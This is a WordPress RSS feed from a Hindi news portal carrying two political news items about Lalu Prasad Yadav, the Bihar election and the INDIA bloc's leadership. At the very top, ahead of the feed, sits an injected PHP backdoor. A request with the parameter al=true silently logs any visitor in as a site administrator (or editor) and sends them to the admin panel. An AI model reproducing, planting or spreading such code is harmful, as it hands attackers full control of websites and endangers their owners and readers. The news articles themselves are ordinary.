// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Lalu Prasad Yadav – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 09 Nov 2025 13:15:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 JDU से दोबारा गठबंधन नहीं! लालू ने खोली RJD की आगे की रणनीति https://pratyushaashakinayikiran.com/?p=190299 Sun, 09 Nov 2025 13:15:00 +0000 https://pratyushaashakinayikiran.com/?p=190299 पटना 
बिहार चुनाव को लेकर सियासी सरगर्मी तेज है। एक तरफ एनडीए के कई नेताओं ने यह साफ कर दिया है कि गठबंधन यह चुनाव नीतीश कुमार के ही चेहरे पर लड़ रहा है तो दूसरी तरफ महागठबंधन ने तेजस्वी यादव को अपना सीएम फेस घोषित कर दिया है। इस बीच राजद सुप्रीमो लालू प्रसाद यादव अपने बेटे तेजस्वी यादव की जीत को लेकर काफी आश्वस्त नजर आ रहे हैं। लालू प्रसाद यादव कई बार कह चुके हैं कि इस चुनाव के परिणाम तेजस्वी के पक्ष में आएंगे और वो बिहार के अगले मुख्यमंत्री बनेंगे।
 
'बातचीत में लालू प्रसाद यादव ने अगर महागठबंधन की सरकार बनती है तो हम बेरोजगारी दूर करेंगे। लालू प्रसाद यादव ने यह भी कहा कि हम इस बार नीतीश कुमार की सरकार को हटाएंगे। इस साक्षात्कार में जब लालू प्रसाद यादव से पूछा गया कि अगर मतगणना के बाद महागठबंधन सरकार बनाने के लिए जादुई आंकड़े से दूर रह जाता है तो क्याा वो नीतीश कुमार के साथ जाएंगे? इसके जवाब में लालू प्रसाद यादव ने कहा, ‘अब हम नीतीश कुमार को स्वीकार नहीं करेंगे। हम नीतीश कुमार के संपर्क में नहीं हैं।’ आपको याद दिला दें कि साल 2015 और साल 2022 में जदयू ने राष्ट्रीय जनता दल से हाथ मिला लिया था। जदयू-राजद की सरकार में तेजस्वी यादव उपमुख्यमंत्री भी बने थे।

लालू ने पहले कही थी नीतीश को साथ लेने की बात
यहां आपको याद दिला दें कि इसी साल जनवरी के महीने में लालू प्रसाद यादव से जब पूछा गया था कि अगर नीतीश कुमार साथ आते हैं तो क्या आप उनको साथ लेंगे? इसपर राजद सुप्रीमो लालू प्रसाद यादव ने दिलचस्प जवाब दिया था। लालू प्रसाद यादव ने कहा था कि हां-हां रख लेंगे। उनकी सारी गलतियां माफ कर देंगे, माफ करना हमारा फर्ज है। हमलोग फैसला लेते हैं लेकिन नीतीश कुमार साथ आएंगे तो रख लेंगे। लालू प्रसाद यादव ने आगे कहा था कि नीतीश कुमार को शोभा नहीं देता। भाग जाते हैं, निकल जाते हैं।

 

]]>
ममता को सौंपी जाए INDIA ब्लॉक की कमान, कांग्रेस के विरोध से कुछ नहीं होता- लालू प्रसाद https://pratyushaashakinayikiran.com/?p=108201 Tue, 10 Dec 2024 12:46:00 +0000 https://pratyushaashakinayikiran.com/?p=108201 नईदिल्ली

इंडिया ब्लॉक में नेतृत्व को लेकर चल रही खींचतान को लेकर आरजेडी नेता लालू प्रसाद यादव ने एक बड़ा बयान दिया है. RJD नेता लालू प्रसाद यादव ने कहा कि पश्चिम बंगाल की मुख्यमंत्री ममता बनर्जी को इंडिया गठबंधन का नेता चुना जाना चाहिए. उन्होंने कहा कि कांग्रेस के विरोध का कोई मतलब नहीं है. ममता को ही नेता बनाया जाना चाहिए. इस दौरान लालू यादव ने जोर देकर कहा कि बिहार में होने वाले अगले चुनाव में उनकी पार्टी सत्ता में आएगी.

इससे पहले बिहार के पूर्व उपमुख्यमंत्री और आरजेडी नेता तेजस्वी यादव ने कहा था कि उन्हें तृणमूल कांग्रेस प्रमुख ममता बनर्जी समेत इंडिया ब्लॉक के किसी भी सीनियर लीडर द्वारा गठबंधन का नेतृत्व करने पर कोई आपत्ति नहीं है, लेकिन उन्होंने जोर देकर कहा कि इस निर्णय पर आम सहमति से पहुंचा जाना चाहिए.

ममता बनर्जी ने क्या कहा था…

पश्चिम बंगाल की मुख्यमंत्री ममता बनर्जी ने हालिया हरियाणा और महाराष्ट्र चुनाव में INDIA ब्लॉक के खराब प्रदर्शन पर असंतोष जाहिर किया है और संकेत दिया कि अगर मौका मिला तो वह INDIA ब्लॉक की कमान संभालने के लिए तैयार है.

तृणमूल कांग्रेस (टीएमसी) सुप्रीमो ने कहा कि वह बंगाल की मुख्यमंत्री के रूप में अपनी भूमिका जारी रखते हुए विपक्षी मोर्चे को चलाने की दोहरी जिम्मेदारी संभाल सकती हैं. एक टीवी चैनल से बात करते हुए ममता बनर्जी ने कहा , "मैंने इंडिया ब्लॉक का गठन किया था, अब मोर्चा का नेतृत्व करने वालों पर इसका प्रबंधन करने की जिम्मेदारी है. अगर वे इसे नहीं चला सकते, तो मैं क्या कर सकती हूं? मैं सिर्फ इतना कहूंगी कि सभी को साथ लेकर चलना होगा."

यह पूछे जाने पर कि एक मजबूत भाजपा विरोधी ताकत के रूप में अपनी साख के बावजूद वह इंडिया ब्लॉक की कमान क्यों नहीं संभाल रही हैं? इस पर बनर्जी ने कहा, "अगर मौका मिला तो मैं इसके सुचारू संचालन को सुनिश्चित करूंगी." उन्होंने कहा, "मैं बंगाल से बाहर नहीं जाना चाहती, लेकिन मैं इसे यहीं से चला सकती हूं."

कांग्रेस ने क्या कहा…

बिहार प्रदेश कांग्रेस अध्यक्ष अखिलेश प्रसाद सिंह ने कहा था कि ममता बनर्जी की पार्टी बंगाल तक ही सीमित है और नेशनल परिप्रेक्ष्य में ममता बनर्जी की पार्टी और उनका व्यक्तित्व उतना बड़ा नहीं है. वहीं, शिवसेना यूबीटी के सांसद संजय राउत ने कहा कि हमें ममता बनर्जी की राय पता है. हम चाहते हैं कि ममता हमारे साथ रहें. हम सभी एक साथ हैं. अगर कोई मतभेद भी है तो वो छोटे-मोटे हैं. हम कोलकाता जाकर ममता बनर्जी से इस पर बात करेंगे. इससे पहले सपा ने भी ममता बनर्जी के नाम पर सहमति जताई थी.

 

]]>